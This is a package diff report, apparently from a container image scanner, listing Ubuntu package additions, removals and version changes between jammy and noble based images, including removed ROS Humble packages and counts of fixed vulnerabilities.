♾️	libxcb-glx0	1.14-3ubuntu3	1.15-1ubuntu2
♾️	libxcb-icccm4	0.4.1-1.1build2	0.4.1-1.1build3
♾️	libxcb-image0	0.4.0-2	0.4.0-2build1
♾️	libxcb-keysyms1	0.4.0-1build3	0.4.0-1build4
♾️	libxcb-present0	1.14-3ubuntu3	1.15-1ubuntu2
♾️	libxcb-randr0	1.14-3ubuntu3	1.15-1ubuntu2
♾️	libxcb-render-util0	0.3.9-1build3	0.3.9-1build4
♾️	libxcb-render0	1.14-3ubuntu3	1.15-1ubuntu2
➕	libxcb-render0-dev		1.15-1ubuntu2
♾️	libxcb-shape0	1.14-3ubuntu3	1.15-1ubuntu2
♾️	libxcb-shm0	1.14-3ubuntu3	1.15-1ubuntu2
➕	libxcb-shm0-dev		1.15-1ubuntu2
♾️	libxcb-sync1	1.14-3ubuntu3	1.15-1ubuntu2
♾️	libxcb-util1	0.4.0-1build2	0.4.0-1build3
♾️	libxcb-xfixes0	1.14-3ubuntu3	1.15-1ubuntu2
♾️	libxcb-xinerama0	1.14-3ubuntu3	1.15-1ubuntu2
♾️	libxcb-xinput0	1.14-3ubuntu3	1.15-1ubuntu2
♾️	libxcb-xkb1	1.14-3ubuntu3	1.15-1ubuntu2
♾️	libxcb1	1.14-3ubuntu3	1.15-1ubuntu2
♾️	libxcb1-dev	1.14-3ubuntu3	1.15-1ubuntu2
➕	libxcomposite-dev		1:0.4.5-1build3
♾️	libxcomposite1	1:0.4.5-1build2	1:0.4.5-1build3
♾️	libxcursor-dev	1:1.2.0-2build4	1:1.2.1-1build1
♾️	libxcursor1	1:1.2.0-2build4	1:1.2.1-1build1
♾️	libxcvt0	0.1.1-3	0.1.2-1build1
➕	libxdamage-dev		1:1.1.6-1build1
♾️	libxdamage1	1:1.1.5-2build2	1:1.1.6-1build1
♾️	libxdmcp-dev	1:1.1.3-0ubuntu5	1:1.1.3-0ubuntu6
♾️	libxdmcp6	1:1.1.3-0ubuntu5	1:1.1.3-0ubuntu6
♾️	libxerces-c-dev	3.2.3+debian-3ubuntu0.1	3.2.4+debian-1.2ubuntu2
➖	libxerces-c3.2	3.2.3+debian-3ubuntu0.1
➕	libxerces-c3.2t64		3.2.4+debian-1.2ubuntu2
♾️	libxext-dev	2:1.3.4-1build1	2:1.3.4-1build2
♾️	libxext6	2:1.3.4-1build1	2:1.3.4-1build2
♾️	libxfixes-dev	1:6.0.0-1	1:6.0.0-2build1
♾️	libxfixes3	1:6.0.0-1	1:6.0.0-2build1
♾️	libxfont2	1:2.0.5-1build1	1:2.0.6-1build1
♾️	libxft-dev	2.3.4-1	2.3.6-1build1
♾️	libxft2	2.3.4-1	2.3.6-1build1
♾️	libxi-dev	2:1.8-1build1	2:1.8.1-1build1
♾️	libxi6	2:1.8-1build1	2:1.8.1-1build1
♾️	libxinerama-dev	2:1.1.4-3	2:1.1.4-3build1
♾️	libxinerama1	2:1.1.4-3	2:1.1.4-3build1
♾️	libxkbcommon-dev	1.4.0-1	1.6.0-1build1
♾️	libxkbcommon-x11-0	1.4.0-1	1.6.0-1build1
♾️	libxkbcommon0	1.4.0-1	1.6.0-1build1
♾️	libxkbfile1	1:1.1.0-1build3	1:1.1.0-1build4
♾️	libxml2	2.9.13+dfsg-1ubuntu0.10	2.9.14+dfsg-1.3ubuntu3.7
		Removed vulnerabilities (4):
♾️	libxml2-dev	2.9.13+dfsg-1ubuntu0.10	2.9.14+dfsg-1.3ubuntu3.7
♾️	libxml2-utils	2.9.13+dfsg-1ubuntu0.10	2.9.14+dfsg-1.3ubuntu3.7
♾️	libxmlb2	0.3.6-2build1	0.3.18-1
♾️	libxmu-dev	2:1.1.3-3	2:1.1.3-3build2
♾️	libxmu-headers	2:1.1.3-3	2:1.1.3-3build2
♾️	libxmu6	2:1.1.3-3	2:1.1.3-3build2
♾️	libxmuu1	2:1.1.3-3	2:1.1.3-3build2
♾️	libxnvctrl0	510.47.03-0ubuntu1	510.47.03-0ubuntu4.24.04.1
♾️	libxpm-dev	1:3.5.12-1ubuntu0.22.04.2	1:3.5.17-1build2
♾️	libxpm4	1:3.5.12-1ubuntu0.22.04.2	1:3.5.17-1build2
♾️	libxrandr-dev	2:1.5.2-1build1	2:1.5.2-2build1
♾️	libxrandr2	2:1.5.2-1build1	2:1.5.2-2build1
♾️	libxrender-dev	1:0.9.10-1build4	1:0.9.10-1.1build1
♾️	libxrender1	1:0.9.10-1build4	1:0.9.10-1.1build1
♾️	libxshmfence1	1.3-1build4	1.3-1build5
➖	libxsimd-dev	7.6.0-2
➖	libxslt1-dev	1.1.34-4ubuntu0.22.04.4
♾️	libxslt1.1	1.1.34-4ubuntu0.22.04.4	1.1.39-0exp1ubuntu0.24.04.3
		Removed vulnerabilities (1):
♾️	libxss-dev	1:1.2.3-1build2	1:1.2.3-1build3
♾️	libxss1	1:1.2.3-1build2	1:1.2.3-1build3
➕	libxstring-perl		0.005-2build3
♾️	libxt-dev	1:1.2.1-1	1:1.2.1-1.2build1
➖	libxt6	1:1.2.1-1
➕	libxt6t64		1:1.2.1-1.2build1
➕	libxtst-dev		2:1.2.3-1.1build1
♾️	libxtst6	2:1.2.3-1build4	2:1.2.3-1.1build1
♾️	libxv-dev	2:1.0.11-1build2	2:1.0.11-1.1build1
♾️	libxv1	2:1.0.11-1build2	2:1.0.11-1.1build1
♾️	libxvidcore4	2:1.3.7-1	2:1.3.7-1build1
♾️	libxxf86vm-dev	1:1.1.4-1build3	1:1.1.4-1build4
♾️	libxxf86vm1	1:1.1.4-1build3	1:1.1.4-1build4
♾️	libxxhash0	0.8.1-1	0.8.2-2build1
➕	libyajl2		2.1.0-5build1
♾️	libyaml-0-2	0.2.2-1build2	0.2.5-1build1
♾️	libyaml-cpp-dev	0.7.0+dfsg-8build1	0.8.0+dfsg-6build1
➖	libyaml-cpp0.7	0.7.0+dfsg-8build1
➕	libyaml-cpp0.8		0.8.0+dfsg-6build1
♾️	libyaml-dev	0.2.2-1build2	0.2.5-1build1
➖	libz3-4	4.8.12-1
➖	libzbar0	0.23.92-4build2
➕	libzbar0t64		0.23.93-4build3
♾️	libzimg2	3.0.3+ds1-1	3.0.5+ds1-1build1
♾️	libzip-dev	1.7.3-1ubuntu2	1.7.3-1.1ubuntu2
➖	libzip4	1.7.3-1ubuntu2
➕	libzip4t64		1.7.3-1.1ubuntu2
➕	libzix-0-0		0.4.2-2build1
♾️	libzmq3-dev	4.3.4-2	4.3.5-1build2
♾️	libzmq5	4.3.4-2	4.3.5-1build2
♾️	libzstd-dev	1.4.8+dfsg-3build1	1.5.5+dfsg2-2build1.1
♾️	libzstd1	1.4.8+dfsg-3build1	1.5.5+dfsg2-2build1.1
♾️	libzvbi-common	0.2.35-19	0.2.42-2
➖	libzvbi0	0.2.35-19
➕	libzvbi0t64		0.2.42-2
➕	libzxing3		2.2.1-3
➖	libzxingcore1	1.2.0-1
➖	libzzip-0-13	0.13.72+dfsg.1-1.1
➕	libzzip-0-13t64		0.13.72+dfsg.1-1.2build1
♾️	linux-libc-dev	5.15.0-164.174	6.8.0-101.101
		Removed vulnerabilities (118):
♾️	linux-libc-dev-armhf-cross	5.15.0-22.22cross3	6.8.0-25.25cross1
♾️	locales	2.35-0ubuntu3.11	2.39-0ubuntu8.7
		Removed vulnerabilities (3):
♾️	login	1:4.8.1-2ubuntu2.2	1:4.13+dfsg1-4ubuntu3.2
♾️	logsave	1.46.5-2ubuntu1.2	1.47.0-2.4~exp1ubuntu4.1
➖	lsb-base	11.1.0ubuntu4
♾️	lsb-release	11.1.0ubuntu4	12.0-2
♾️	lto-disabled-list	24	47
➕	lttng-tools		2.13.11-2.1build4
♾️	m4	1.4.18-5ubuntu2	1.4.19-4build1
➖	mailcap	3.70+nmu1ubuntu1
♾️	make	4.3-4.1build1	4.3-4.1build2
♾️	mawk	1.3.4.20200120-3	1.3.4.20240123-1build1
♾️	media-types	7.0.0	10.1.0
➕	mercurial		6.7.2-1ubuntu2.2
➕	mercurial-common		6.7.2-1ubuntu2.2
➕	mesa-libgallium		25.2.8-0ubuntu0.24.04.1
➖	mime-support	3.66
♾️	mount	2.37.2-4ubuntu3.4	2.39.3-9ubuntu6.4
♾️	mpi-default-bin	1.14	1.15build1
♾️	mpi-default-dev	1.14	1.15build1
♾️	mysql-common	5.8+1.0.8	5.8+1.1.0build1
♾️	ncurses-base	6.3-2ubuntu0.1	6.4+20240113-1ubuntu2
♾️	ncurses-bin	6.3-2ubuntu0.1	6.4+20240113-1ubuntu2
➕	netbase		6.4
♾️	ocl-icd-libopencl1	2.2.14-3	2.3.2-1build1
➖	openjdk-11-jdk	11.0.29+7-1ubuntu1~22.04
➖	openjdk-11-jdk-headless	11.0.29+7-1ubuntu1~22.04
➖	openjdk-11-jre	11.0.29+7-1ubuntu1~22.04
		Removed vulnerabilities (4):
➖	openjdk-11-jre-headless	11.0.29+7-1ubuntu1~22.04
➕	openjdk-21-jdk		21.0.10+7-1~24.04
➕	openjdk-21-jdk-headless		21.0.10+7-1~24.04
➕	openjdk-21-jre		21.0.10+7-1~24.04
➕	openjdk-21-jre-headless		21.0.10+7-1~24.04
♾️	openmpi-bin	4.1.2-2ubuntu1	4.1.6-7ubuntu2
♾️	openmpi-common	4.1.2-2ubuntu1	4.1.6-7ubuntu2
♾️	openssh-client	1:8.9p1-3ubuntu0.13	1:9.6p1-3ubuntu13.14
♾️	openssl	3.0.2-0ubuntu1.20	3.0.13-0ubuntu3.7
		Removed vulnerabilities (8):
♾️	packagekit	1.2.5-2ubuntu3	1.2.8-2ubuntu1.4
➕	pango1.0-tools		1.52.1+ds-1build1
♾️	passwd	1:4.8.1-2ubuntu2.2	1:4.13+dfsg1-4ubuntu3.2
♾️	patch	2.7.6-7build2	2.7.6-7build3
♾️	perl	5.34.0-3ubuntu1.5	5.38.2-3.2ubuntu0.2
♾️	perl-base	5.34.0-3ubuntu1.5	5.38.2-3.2ubuntu0.2
➖	perl-modules-5.34	5.34.0-3ubuntu1.5
➕	perl-modules-5.38		5.38.2-3.2ubuntu0.2
♾️	pinentry-curses	1.1.1-1build2	1.2.1-3ubuntu5
➖	pkexec	0.105-33
♾️	pkg-config	0.29.2-1ubuntu3	1.8.1-2build1
➕	pkgconf		1.8.1-2build1
➕	pkgconf-bin		1.8.1-2build1

[JLP04]

Packages and Vulnerabilities (3003 package changes and 236 vulnerability changes)

• ➕ 864 packages added
• ➖ 682 packages removed
• ♾️ 1457 packages changed
• 134 packages unchanged

• ❗ 10 vulnerabilities added
• ✔️ 226 vulnerabilities removed

Changes for packages of type deb (2656 changes)

➖	policykit-1	0.105-33
♾️	polkitd	0.105-33	124-2ubuntu1.24.04.2
♾️	ppp	2.4.9-1+1ubuntu3	2.4.9-1+1.1ubuntu4
♾️	procps	2:3.3.17-6ubuntu2.1	2:4.0.4-4ubuntu3.2
♾️	proj-data	8.2.1-1	9.4.0-1build2
♾️	protobuf-compiler	3.12.4-1ubuntu7.22.04.4	3.21.12-8.2ubuntu0.2
♾️	pybind11-dev	2.9.1-2	2.11.1-2
♾️	pydocstyle	6.1.1-1	6.3.0-1.1
♾️	pyqt5-dev	5.15.6+dfsg-1ubuntu3	5.15.10+dfsg-1build6
♾️	python-apt-common	2.4.0ubuntu4.1	2.7.7ubuntu5.2
➖	python-babel-localedata	2.8.0+dfsg.1-7
➖	python-is-python3	3.9.2-2
♾️	python-matplotlib-data	3.5.1-2build1	3.6.3-1ubuntu5
♾️	python3	3.10.6-1~22.04.1	3.12.3-0ubuntu2.1
♾️	python3-appdirs	1.4.4-2	1.4.4-4
♾️	python3-apt	2.4.0ubuntu4.1	2.7.7ubuntu5.2
♾️	python3-argcomplete	1.8.1-1.5	3.1.4-1ubuntu0.1
♾️	python3-attr	21.2.0-1ubuntu1	23.2.0-2
➖	python3-babel	2.8.0+dfsg.1-7
➖	python3-beniget	0.4.1-2
♾️	python3-blinker	1.4+dfsg1-0.4	1.7.0-1
➕	python3-breezy		3.3.5-6build2
♾️	python3-brotli	1.0.9-2build6	1.1.0-2build2
♾️	python3-cairo	1.20.1-3build1	1.25.1-2build2
♾️	python3-cffi-backend	1.15.0-1build2	1.16.0-2build1
♾️	python3-click	8.0.3-1	8.1.6-2
♾️	python3-colcon-ros	0.5.0-100	0.5.0+upstream-1
♾️	python3-colorama	0.4.4-1	0.4.6-4
➕	python3-configobj		5.0.8-3
➕	python3-contourpy		1.0.7-2build1
♾️	python3-cryptography	3.4.8-1ubuntu2.2	41.0.7-4ubuntu0.1
♾️	python3-cycler	0.11.0-1	0.11.0-2
♾️	python3-dateutil	2.8.1-6	2.8.2-3ubuntu1
♾️	python3-dbus	1.2.18-3build1	1.3.2-5build3
♾️	python3-decorator	4.4.2-0ubuntu1	5.1.1-5
➕	python3-deprecated		1.2.14-1
♾️	python3-dev	3.10.6-1~22.04.1	3.12.3-0ubuntu2.1
♾️	python3-distlib	0.3.4-1	0.3.8-1
♾️	python3-distro	1.7.0-1	1.9.0-1
➖	python3-distutils	3.10.8-1~22.04
♾️	python3-docutils	0.17.1+dfsg-2	0.20.1+dfsg-3
➕	python3-dulwich		0.21.6-1build2
➕	python3-fastbencode		0.2-1build2
♾️	python3-flake8	4.0.1-2	7.0.0-1
➕	python3-flake8-builtins		2.1.0-1
➕	python3-flake8-comprehensions		3.14.0-1
➕	python3-flake8-docstrings		1.6.0-2
➕	python3-flake8-import-order		0.18.2-2
➕	python3-flake8-quotes		3.4.0-1
♾️	python3-fonttools	4.29.1-2build1	4.46.0-1build2
♾️	python3-fs	2.4.12-1	2.4.16-3
➖	python3-gast	0.5.2-2
♾️	python3-gi	3.42.1-0ubuntu1	3.48.2-1
♾️	python3-gz-math7	7.5.1-1~jammy	7.5.1-1~noble
♾️	python3-gz-msgs10	10.3.2-1~jammy	10.3.2-1~noble
♾️	python3-gz-sim8	8.10.0-1~jammy	8.10.0-1~noble
♾️	python3-gz-transport13	13.5.0-1~jammy	13.5.0-1~noble
♾️	python3-httplib2	0.20.2-2	0.20.4-3
♾️	python3-importlib-metadata	4.6.4-1	4.12.0-1
➖	python3-jeepney	0.7.1-3
♾️	python3-jinja2	3.0.3-1ubuntu0.4	3.1.2-1ubuntu1.3
♾️	python3-jwt	2.3.0-1ubuntu0.2	2.7.0-1
➖	python3-keyring	23.5.0-1
♾️	python3-kiwisolver	1.3.2-1build1	1.4.4-2build1
♾️	python3-lark	1.1.1-1	1.1.9-1
♾️	python3-launchpadlib	1.10.16-1	1.11.0-6
♾️	python3-lazr.restfulclient	0.14.4-1	0.14.6-1
♾️	python3-lazr.uri	1.0.6-2	1.0.6-3
➖	python3-lib2to3	3.10.8-1~22.04
♾️	python3-lxml	4.8.0-1build1	5.2.1-1
♾️	python3-lz4	3.1.3+dfsg-1build3	4.0.2+dfsg-1build4
♾️	python3-markupsafe	2.0.1-2build1	2.1.5-1build2
♾️	python3-matplotlib	3.5.1-2build1	3.6.3-1ubuntu5
♾️	python3-mccabe	0.6.1-3	0.7.0-1
➕	python3-merge3		0.0.8-1
♾️	python3-minimal	3.10.6-1~22.04.1	3.12.3-0ubuntu2.1
♾️	python3-more-itertools	8.10.0-2	10.2.0-1
♾️	python3-mpi4py	3.1.3-1build2	3.1.5-5ubuntu2
♾️	python3-mpmath	1.2.1-2	1.2.1-3
➖	python3-netifaces	0.11.0-1build2
♾️	python3-notify2	0.3-4	0.3-5
♾️	python3-numpy	1:1.21.5-1ubuntu22.04.1	1:1.26.4+ds-6ubuntu1
♾️	python3-oauthlib	3.2.0-1ubuntu0.1	3.2.2-1
♾️	python3-opencv	4.5.4+dfsg-9ubuntu4	4.6.0+dfsg-13.1ubuntu1
♾️	python3-packaging	21.3-1	24.0-1
➕	python3-patiencediff		0.2.13-1build2
♾️	python3-pexpect	4.8.0-2ubuntu1	4.9-2
♾️	python3-pil	9.0.1-1ubuntu0.3	10.2.0-1ubuntu1
♾️	python3-pil.imagetk	9.0.1-1ubuntu0.3	10.2.0-1ubuntu1
♾️	python3-pip	22.0.2+dfsg-1ubuntu0.7	24.0+dfsg-1ubuntu1.3
➕	python3-pip-whl		24.0+dfsg-1ubuntu1.3
♾️	python3-pkg-resources	59.6.0-1.2ubuntu0.22.04.3	68.1.2-2ubuntu1.2
♾️	python3-pluggy	0.13.0-7.1	1.4.0-1
➖	python3-ply	3.11-5
♾️	python3-protobuf	3.12.4-1ubuntu7.22.04.4	3.21.12-8.2ubuntu0.2
♾️	python3-psutil	5.9.0-1build1	5.9.8-2build2
♾️	python3-ptyprocess	0.7.0-3	0.7.0-5
➖	python3-py	1.10.0-1
♾️	python3-pybind11	2.9.1-2	2.11.1-2
♾️	python3-pycodestyle	2.8.0-2	2.11.1-1
♾️	python3-pydocstyle	6.1.1-1	6.3.0-1.1
♾️	python3-pydot	1.4.2-1build1	1.4.2-2
♾️	python3-pyflakes	2.4.0-2	3.2.0-1
♾️	python3-pygments	2.11.2+dfsg-2ubuntu0.1	2.17.2+dfsg-1
♾️	python3-pykdl	1.5.1-2build1	1.5.1-4build1
♾️	python3-pyparsing	2.4.7-1	3.1.1-1
♾️	python3-pyqt5	5.15.6+dfsg-1ubuntu3	5.15.10+dfsg-1build6
♾️	python3-pyqt5.qtsvg	5.15.6+dfsg-1ubuntu3	5.15.10+dfsg-1build6
♾️	python3-pyqt5.sip	12.9.1-1build1	12.13.0-1build3
♾️	python3-pyside2.qtcore	5.15.2-2build2	5.15.13-1
♾️	python3-pyside2.qtgui	5.15.2-2build2	5.15.13-1
♾️	python3-pyside2.qtsvg	5.15.2-2build2	5.15.13-1
♾️	python3-pyside2.qtwidgets	5.15.2-2build2	5.15.13-1
♾️	python3-pytest	6.2.5-1ubuntu2	7.4.4-1
➖	python3-pythran	0.10.0+ds2-1
♾️	python3-rencode	1.0.6-2build1	1.0.6-2build5
♾️	python3-roman	3.3-1	3.3-3
♾️	python3-rospkg-modules	1.6.0-1	1.6.1-1
♾️	python3-scipy	1.8.0-1exp2ubuntu1	1.11.4-6build1
♾️	python3-sdformat14	14.8.0-1~jammy	14.9.0-1~noble
➖	python3-secretstorage	3.3.1-1
➖	python3-serial	3.5-1
♾️	python3-setuptools	59.6.0-1.2ubuntu0.22.04.3	68.1.2-2ubuntu1.2
➕	python3-setuptools-whl		68.1.2-2ubuntu1.2
♾️	python3-sip	4.19.25+dfsg-3build1	4.19.25+dfsg-5build3
♾️	python3-sip-dev	4.19.25+dfsg-3build1	4.19.25+dfsg-5build3
♾️	python3-six	1.16.0-3ubuntu1	1.16.0-4
♾️	python3-snowballstemmer	2.2.0-1build1	2.2.0-4build1
♾️	python3-software-properties	0.99.22.9	0.99.49.3
♾️	python3-sympy	1.9-1	1.12-7
♾️	python3-tk	3.10.8-1~22.04	3.12.3-0ubuntu1
➖	python3-toml	0.10.2-1
♾️	python3-tz	2022.1-1ubuntu0.22.04.1	2024.1-2
➕	python3-tzlocal		5.2-1.1
♾️	python3-ufolib2	0.13.1+dfsg1-1	0.16.0+dfsg1-1
♾️	python3-unicodedata2	14.0.0+ds-8	15.1.0+ds-1build1
➕	python3-urllib3		2.0.7-1ubuntu0.6
♾️	python3-vcstools	0.1.42-4	0.1.42-1
♾️	python3-vtk9	9.1.0+really9.1.0+dfsg2-3build1	9.1.0+really9.1.0+dfsg2-7.1build3
♾️	python3-wadllib	1.3.6-1	1.3.6-5
♾️	python3-wheel	0.37.1-2ubuntu0.22.04.1	0.42.0-2
➕	python3-wrapt		1.15.0-2build3
♾️	python3-wxgtk4.0	4.0.7+dfsg-13build1	4.2.1+dfsg-3build2
♾️	python3-yaml	5.4.1-1ubuntu1	6.0.1-2build2
♾️	python3-zipp	1.0.0-3ubuntu0.1	1.0.0-6ubuntu0.1
➖	python3.10	3.10.12-1~22.04.12
		Removed vulnerabilities (9):
➖	python3.10-dev	3.10.12-1~22.04.12
➖	python3.10-minimal	3.10.12-1~22.04.12
➕	python3.12		3.12.3-1ubuntu0.11
➕	python3.12-dev		3.12.3-1ubuntu0.11
➕	python3.12-minimal		3.12.3-1ubuntu0.11
➕	python3.12-venv		3.12.3-1ubuntu0.11
♾️	qdoc-qt5	5.15.3-1	5.15.13-1
♾️	qhelpgenerator-qt5	5.15.3-1	5.15.13-1
♾️	qml-module-qt-labs-folderlistmodel	5.15.3+dfsg-1	5.15.13+dfsg-1ubuntu0.1
♾️	qml-module-qt-labs-platform	5.15.3+dfsg-1	5.15.13+dfsg-1
♾️	qml-module-qt-labs-settings	5.15.3+dfsg-1	5.15.13+dfsg-1ubuntu0.1
♾️	qml-module-qtcharts	5.15.3-1	5.15.13-1
♾️	qml-module-qtgraphicaleffects	5.15.3-1	5.15.13-1
♾️	qml-module-qtqml	5.15.3+dfsg-1	5.15.13+dfsg-1ubuntu0.1
♾️	qml-module-qtqml-models2	5.15.3+dfsg-1	5.15.13+dfsg-1ubuntu0.1
♾️	qml-module-qtquick-controls	5.15.3-1	5.15.13-1
♾️	qml-module-qtquick-controls2	5.15.3+dfsg-1	5.15.13+dfsg-1
♾️	qml-module-qtquick-dialogs	5.15.3-1	5.15.13-1
♾️	qml-module-qtquick-layouts	5.15.3+dfsg-1	5.15.13+dfsg-1ubuntu0.1
♾️	qml-module-qtquick-privatewidgets	5.15.3-1	5.15.13-1
♾️	qml-module-qtquick-templates2	5.15.3+dfsg-1	5.15.13+dfsg-1
♾️	qml-module-qtquick-window2	5.15.3+dfsg-1	5.15.13+dfsg-1ubuntu0.1
♾️	qml-module-qtquick2	5.15.3+dfsg-1	5.15.13+dfsg-1ubuntu0.1
♾️	qt5-assistant	5.15.3-1	5.15.13-1
♾️	qt5-qmake	5.15.3+dfsg-2ubuntu0.2	5.15.13+dfsg-1ubuntu1
♾️	qt5-qmake-bin	5.15.3+dfsg-2ubuntu0.2	5.15.13+dfsg-1ubuntu1
♾️	qt5-qmltooling-plugins	5.15.3+dfsg-1	5.15.13+dfsg-1ubuntu0.1
♾️	qtattributionsscanner-qt5	5.15.3-1	5.15.13-1
♾️	qtbase5-dev	5.15.3+dfsg-2ubuntu0.2	5.15.13+dfsg-1ubuntu1
♾️	qtbase5-dev-tools	5.15.3+dfsg-2ubuntu0.2	5.15.13+dfsg-1ubuntu1
♾️	qtchooser	66-2build1	66-2build2
♾️	qtdeclarative5-dev	5.15.3+dfsg-1	5.15.13+dfsg-1ubuntu0.1
♾️	qtdeclarative5-dev-tools	5.15.3+dfsg-1	5.15.13+dfsg-1ubuntu0.1
♾️	qtquickcontrols2-5-dev	5.15.3+dfsg-1	5.15.13+dfsg-1
♾️	qttools5-dev	5.15.3-1	5.15.13-1
♾️	qttools5-dev-tools	5.15.3-1	5.15.13-1
♾️	qttools5-private-dev	5.15.3-1	5.15.13-1
♾️	rake	13.0.6-2	13.0.6-3
♾️	rapidjson-dev	1.1.0+dfsg2-7	1.1.0+dfsg2-7.2
♾️	readline-common	8.1.2-1	8.2-4build1
➖	ros-humble-action-msgs	1.2.2-1jammy.20251108.021128
➖	ros-humble-action-tutorials-cpp	0.20.7-1jammy.20251118.233405
➖	ros-humble-action-tutorials-interfaces	0.20.7-1jammy.20251118.150934
➖	ros-humble-action-tutorials-py	0.20.7-1jammy.20251118.215445
➖	ros-humble-actionlib-msgs	4.9.0-1jammy.20251108.023545
➖	ros-humble-ament-cmake	1.3.12-1jammy.20250701.021045
➖	ros-humble-ament-cmake-auto	1.3.12-1jammy.20250701.023608
➖	ros-humble-ament-cmake-copyright	0.12.14-1jammy.20250718.231522
➖	ros-humble-ament-cmake-core	1.3.12-1jammy.20250701.005441
➖	ros-humble-ament-cmake-cppcheck	0.12.14-1jammy.20250718.232306
➖	ros-humble-ament-cmake-cpplint	0.12.14-1jammy.20250718.232326
➖	ros-humble-ament-cmake-export-definitions	1.3.12-1jammy.20250701.011358
➖	ros-humble-ament-cmake-export-dependencies	1.3.12-1jammy.20250701.011607
➖	ros-humble-ament-cmake-export-include-directories	1.3.12-1jammy.20250701.011607
➖	ros-humble-ament-cmake-export-interfaces	1.3.12-1jammy.20250701.011817
➖	ros-humble-ament-cmake-export-libraries	1.3.12-1jammy.20250701.011611
➖	ros-humble-ament-cmake-export-link-flags	1.3.12-1jammy.20250701.011612
➖	ros-humble-ament-cmake-export-targets	1.3.12-1jammy.20250701.011836
➖	ros-humble-ament-cmake-flake8	0.12.14-1jammy.20250718.232346
➖	ros-humble-ament-cmake-gen-version-h	1.3.12-1jammy.20250701.012952
➖	ros-humble-ament-cmake-gmock	1.3.12-1jammy.20250701.012952
➖	ros-humble-ament-cmake-gtest	1.3.12-1jammy.20250701.012110
➖	ros-humble-ament-cmake-include-directories	1.3.12-1jammy.20250701.011618
➖	ros-humble-ament-cmake-libraries	1.3.12-1jammy.20250701.011511
➖	ros-humble-ament-cmake-lint-cmake	0.12.14-1jammy.20250718.231306
➖	ros-humble-ament-cmake-pep257	0.12.14-1jammy.20250718.232349
➖	ros-humble-ament-cmake-pytest	1.3.12-1jammy.20250701.012931
➖	ros-humble-ament-cmake-python	1.3.12-1jammy.20250701.011622
➖	ros-humble-ament-cmake-ros	0.10.0-3jammy.20250718.233533
➖	ros-humble-ament-cmake-target-dependencies	1.3.12-1jammy.20250701.011815
➖	ros-humble-ament-cmake-test	1.3.12-1jammy.20250701.011837
➖	ros-humble-ament-cmake-uncrustify	0.12.14-1jammy.20250718.232325
➖	ros-humble-ament-cmake-version	1.3.12-1jammy.20250701.011519
➖	ros-humble-ament-cmake-xmllint	0.12.14-1jammy.20250718.232349
➖	ros-humble-ament-copyright	0.12.14-1jammy.20250718.230934
➖	ros-humble-ament-cppcheck	0.12.14-1jammy.20250718.225923
➖	ros-humble-ament-cpplint	0.12.14-1jammy.20250718.231251
➖	ros-humble-ament-flake8	0.12.14-1jammy.20250718.230459
➖	ros-humble-ament-index-cpp	1.4.0-2jammy.20250718.233542
➖	ros-humble-ament-index-python	1.4.0-2jammy.20250718.231234
➖	ros-humble-ament-lint	0.12.14-1jammy.20250718.225926
➖	ros-humble-ament-lint-auto	0.12.14-1jammy.20250718.225929
➖	ros-humble-ament-lint-cmake	0.12.14-1jammy.20250718.231237
➖	ros-humble-ament-lint-common	0.12.14-1jammy.20250718.232620
➖	ros-humble-ament-package	0.14.1-1jammy.20250522.030837
➖	ros-humble-ament-pep257	0.12.14-1jammy.20250718.230819
➖	ros-humble-ament-uncrustify	0.12.14-1jammy.20250718.231228
➖	ros-humble-ament-xmllint	0.12.14-1jammy.20250718.231247
➖	ros-humble-angles	1.15.0-1jammy.20250701.021637
➖	ros-humble-builtin-interfaces	1.2.2-1jammy.20251108.015641
➖	ros-humble-class-loader	2.2.0-3jammy.20251108.013357
➖	ros-humble-common-interfaces	4.9.0-1jammy.20251108.031707
➖	ros-humble-composition	0.20.7-1jammy.20251118.221024
➖	ros-humble-composition-interfaces	1.2.2-1jammy.20251108.034947
➖	ros-humble-console-bridge-vendor	1.4.1-1jammy.20250718.233135
➖	ros-humble-cv-bridge	3.2.1-1jammy.20251108.035708
➖	ros-humble-demo-nodes-cpp	0.20.7-1jammy.20251118.221035
➖	ros-humble-demo-nodes-cpp-native	0.20.7-1jammy.20251118.221032
➖	ros-humble-demo-nodes-py	0.20.7-1jammy.20251118.215525
➖	ros-humble-depthimage-to-laserscan	2.5.1-1jammy.20251118.223942
➖	ros-humble-desktop	0.10.0-1jammy.20251119.020420
➖	ros-humble-diagnostic-msgs	4.9.0-1jammy.20251108.024810
➖	ros-humble-diagnostic-updater	4.0.6-1jammy.20251118.221111
➖	ros-humble-domain-coordinator	0.10.0-3jammy.20250718.231113
➖	ros-humble-dummy-map-server	0.20.7-1jammy.20251118.215319
➖	ros-humble-dummy-robot-bringup	0.20.7-1jammy.20251118.234742
➖	ros-humble-dummy-sensors	0.20.7-1jammy.20251118.215312
➖	ros-humble-eigen-stl-containers	1.1.0-1jammy.20250701.022309
➖	ros-humble-eigen3-cmake-module	0.1.1-4jammy.20250718.231722
➖	ros-humble-example-interfaces	0.9.3-2jammy.20251108.022045
➖	ros-humble-examples-rclcpp-minimal-action-client	0.15.5-1jammy.20251118.224341
➖	ros-humble-examples-rclcpp-minimal-action-server	0.15.5-1jammy.20251118.224352
➖	ros-humble-examples-rclcpp-minimal-client	0.15.5-1jammy.20251118.224353
➖	ros-humble-examples-rclcpp-minimal-composition	0.15.5-1jammy.20251118.224358
➖	ros-humble-examples-rclcpp-minimal-publisher	0.15.5-1jammy.20251118.224405
➖	ros-humble-examples-rclcpp-minimal-service	0.15.5-1jammy.20251118.224405
➖	ros-humble-examples-rclcpp-minimal-subscriber	0.15.5-1jammy.20251118.224404
➖	ros-humble-examples-rclcpp-minimal-timer	0.15.5-1jammy.20251118.224404
➖	ros-humble-examples-rclcpp-multithreaded-executor	0.15.5-1jammy.20251118.224410
➖	ros-humble-examples-rclpy-executors	0.15.5-1jammy.20251118.220452
➖	ros-humble-examples-rclpy-minimal-action-client	0.15.5-1jammy.20251118.220453
➖	ros-humble-examples-rclpy-minimal-action-server	0.15.5-1jammy.20251118.220505
➖	ros-humble-examples-rclpy-minimal-client	0.15.5-1jammy.20251118.220507
➖	ros-humble-examples-rclpy-minimal-publisher	0.15.5-1jammy.20251118.220514
➖	ros-humble-examples-rclpy-minimal-service	0.15.5-1jammy.20251118.220536
➖	ros-humble-examples-rclpy-minimal-subscriber	0.15.5-1jammy.20251118.220537
➖	ros-humble-fastcdr	1.0.24-2jammy.20250701.011925
➖	ros-humble-fastrtps	2.6.10-1jammy.20250718.233605
➖	ros-humble-fastrtps-cmake-module	2.2.3-1jammy.20250924.083922
➖	ros-humble-foonathan-memory-vendor	1.2.0-3jammy.20250718.233416
➖	ros-humble-geographic-msgs	1.0.6-1jammy.20251108.025024
